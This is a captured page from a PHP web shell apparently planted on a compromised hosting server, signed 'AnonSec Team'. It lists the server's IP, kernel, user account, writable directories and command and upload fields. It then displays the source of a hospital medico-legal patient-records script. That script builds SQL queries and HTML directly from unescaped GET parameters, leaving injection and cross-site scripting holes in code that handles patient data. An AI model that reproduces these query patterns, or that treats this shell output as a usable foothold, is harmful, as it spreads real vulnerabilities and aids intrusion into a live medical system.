Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.221.142.39
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/MLC_Record.php
<?php
session_start();
require_once("../LoginManager.php");
require_once("../DBManager.php");
include("workdeskmenu.php");
include("header.php");
?>
  <style>

 
 
 .p{
     color: black;
          font-weight: 900;
 }
/* Automatic Serial Number Row */
.css-serial {
     font-weight: 900;
       color: black;
 counter-reset: serial-number; /* Set the serial number counter to 0 */
}
.css-serial td:first-child:before {
 counter-increment: serial-number; /* Increment the serial number counter */
 content: counter(serial-number); /* Display the counter */
}
</style>
 <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">


<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="Dashboard">
    <meta name="keyword" content="Dashboard, Bootstrap, Admin, Template, Theme, Responsive, Fluid, Retina">
    <title>Trauma Injury Record</title>
 
  <body>
      
           	
          	<style>
    form{
        margin: 20px 0;
    }
    form input, button{
        padding: 5px;
    }
    table{
        width: 100%;
        margin-bottom: 20px;
		border-collapse: collapse;
    }
    table, th, td{
        border: 1px solid #cdcdcd;
    }
    table th, table td{
        padding: 10px;
        text-align: left;
    }
	<style>
           
			table{
    border: solid 1px gray;
    width: 100%;
  }
  </style>
       <script>
function myFunction11() {
  var checkBox = document.getElementById("myCheck11");
  var text = document.getElementById("text11");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
function myFunction12() {
  var checkBox = document.getElementById("myCheck12");
  var text = document.getElementById("text12");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
</script>
  </head>
  <br/><br/><br/><br/>	 
<div class="checkbox"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <input name="Addiction" id="myCheck11" class="shopitem-list" onclick="myFunction11()" type="checkbox"><span>Single Date </span>
</div>
<div id="text11" style="display:none" >
          
              <input type="date" onchange="dateloadipd(this.value)">
                        </div>
                        
                         <div class="checkbox"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <input name="Addiction" id="myCheck12" onclick="myFunction12()" class="shopitem-list" type="checkbox"><span>Custom Date </span>
</div>
<div id="text12" style="display:none" >
            
                 
                         
            <form action="" method="GET">
                            <div class="row">
                                <div class="col-md-4">
                                    <div class="form-group">
                                        <label>From Date</label>
                                        <input type="date" name="from_date" value="<?php if(isset($_GET['from_date'])){ echo $_GET['from_date']; } ?>" class="form-control">
                                    </div>
                                </div>
                                <div class="col-md-4">
                                    <div class="form-group">
                                        <label>To Date</label>
                                        <input type="date" name="to_date" value="<?php if(isset($_GET['to_date'])){ echo $_GET['to_date']; } ?>" class="form-control">
                                    </div>
                                </div>
                                <div class="col-md-4">
                                    <div class="form-group">
                                         <br>
                                      <button type="submit" class="btn btn-primary">Apply</button>
                                    </div>
                                </div>
                            </div>
                        </form>
                         </div>
                        
                        
                               
                                 <button style='height:40px;width:200px' onclick="location.href='MLC_Record.php'" type="button"> <span style="color:white">    Reset</span></button>
                                 </section>
                                  <div id="PrintContent"> 
                                 <?php
                                 include'hsprofileworkdesk.php';
                                 ?>
                                 
     <link rel="stylesheet" href="assets/style.css">                   
                      <center>	<h3 class='code'>  Medico Legal Case	</h3>
           	
          <a href="#" style="float:right;font-size:20px;margin-top:-23px;"><i class="fa fa-info-circle" aria-hidden="true" ></i></a></center>                                 
                                 	
    <div id="container">
        
   <?php 
		session_start();
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql19 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql19 = mysqli_query($con,$sql19);
	while($re12 = mysqli_fetch_array($qsql19))
		{
		     if(isset($_GET['from_date']) && isset($_GET['to_date']))
                                {
                                    $from_date = $_GET['from_date'];
                                    $to_date = $_GET['to_date'];
}
  $sql78="SELECT count('id') FROM discharge  WHERE entered_by='$re12[entered_by]' AND created_at BETWEEN '$from_date' AND '$to_date'";
$result45=mysqli_query($con,$sql78); 
$row1=mysqli_fetch_array($result45);
echo"<p align='right'><b>From Date</b> $_GET[from_date] -<b>TO</b> $_GET[to_date]</p>";
if($row1[0]=='0')
{

    echo"<h1 align='center'>
  No Record Found</h1>";
}

//echo "<h3><b>Total Patient :</b> $row1[0]</h3>";
mysqli_close($con);
}
?>       
 <table border="1" class="order-table css-serial" style='width:100%;'>
      <tbody>
                  <tr><th>SR No</th>
          <th><div align="center">Created  </div></th>
          <th><div align="center">Patient Details</div></th>
          <th><div align="center">Select </div></th>
                         </tr>
        </tbody>
<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
		{
		      if(isset($_GET['from_date']) && isset($_GET['to_date']))
                                {
                                    $from_date = $_GET['from_date'];
                                    $to_date = $_GET['to_date'];
}
		$sql2 ="SELECT * FROM discharge WHERE hospital_id='$re[entered_by]' AND created_at BETWEEN '$from_date' AND '$to_date' ";
		$qsql2 = mysqli_query($con,$sql2);
		while($rs = mysqli_fetch_array($qsql2))
		{
		    $sql6 ="SELECT * FROM mlc WHERE prescriptionid='$rs[prescriptionid]'";
		$qsql6 = mysqli_query($con,$sql6);
		while($rs1 = mysqli_fetch_array($qsql6))
		{
		    	$sql11 ="SELECT * FROM site_users WHERE userno='$rs1[entered_by]' AND entered_by='$re[entered_by]' ";
		$qsql11 = mysqli_query($con,$sql11);
	while($re11 = mysqli_fetch_array($qsql11))
		{
			    $sql5 ="SELECT * FROM patient WHERE patientid='$rs1[patientid]'";
		$qsql5 = mysqli_query($con,$sql5);
		while($rp = mysqli_fetch_array($qsql5))
		{
		    
        echo " <tbody>
            <tr>
                  <td>&nbsp;</td>
                 <td><b>Created at:</b>$rs1[created_at]<br>
                 <b>Created By :</b> $re11[name] </td>
                  <td><b>UHID :</b>$rp[patientid]
                  <br><b>Patient Name :</b>$rp[patientname]</td>
                                                                  	<td><a href='treatment_timline.php?prescriptionid=$rs1[prescriptionid]&patientid=$rs1[patientid]'>View</td>
          </tr>                   
          
          ";
}
}
}
}
}
?>    </tbody>
  <tfoot>
          </tfoot>
        </table>
      </div>
<?php
if(isset($_SESSION[doctorid]))
{
?>  
<hr>
	<table>
		<tr>
			<td>
			<div align="center"><strong><a href="prescription.php?patientid=<?php echo $_GET[patientid]; ?>&appid=<?php echo $rsappointment[appointmentid]; ?>">Add Prescription records</a></strong></div>
			</td>
		</tr>
	</table>
	<script>
  $(function () {
    $("#example1").DataTable({
      "responsive": true,
      "autoWidth": false,
    });
    $('#example2').DataTable({
      "paging": true,
      "lengthChange": false,
      "searching": false,
      "ordering": true,
      "info": true,
      "autoWidth": false,
      "responsive": true,
    });
  });
</script>

<?php
}
?>

Anon7 - 2022
AnonSec Team